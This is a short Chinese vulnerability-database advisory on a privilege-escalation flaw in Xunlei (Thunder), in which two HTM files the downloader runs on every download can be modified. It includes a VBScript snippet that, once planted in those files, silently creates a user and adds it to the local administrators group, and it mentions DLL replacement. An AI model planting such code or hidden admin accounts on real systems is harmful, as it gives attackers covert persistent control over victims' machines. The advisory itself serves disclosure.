迅雷极速版权限提升漏洞 CNVD-2015-07838

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

迅雷下载东西的时候,会调用我们安装迅雷后一个htm文件,去激活htm文件里的一些代码, 把我们所下载东西添加到列表当中。 所对应的htm文件有2处: `C:\Program Files\Thunder Network\Thunder\Program\geturl.htm` `C:\Program Files\Thunder Network\Thunder\Program\getAllurl.htm` 如果我们想把我们想要的代码添加进去执行了? 我们简单写个代码试试,代码如下: ``` <script language="VBScript"> Set vbs=CreateObject("Wscript.Shell") vbs.run "cmd /c net user xxx xxx /add",0 ; vbs.run "cmd /c net localgroup administrators xxx /add",0 </script> ``` 应该大家都可以看的出,如果我们把这段代码添加到那2个htm文件里,当迅雷下载东西的时候,一样会去执行我们的代码。添加一个administrators组的一个用户xxx 当然,代码大家可以自定义的 测试通过,迅雷版本为5.9.2.927 还可以替换dll

0%
暂无可用Exp或PoC
当前有0条受影响产品信息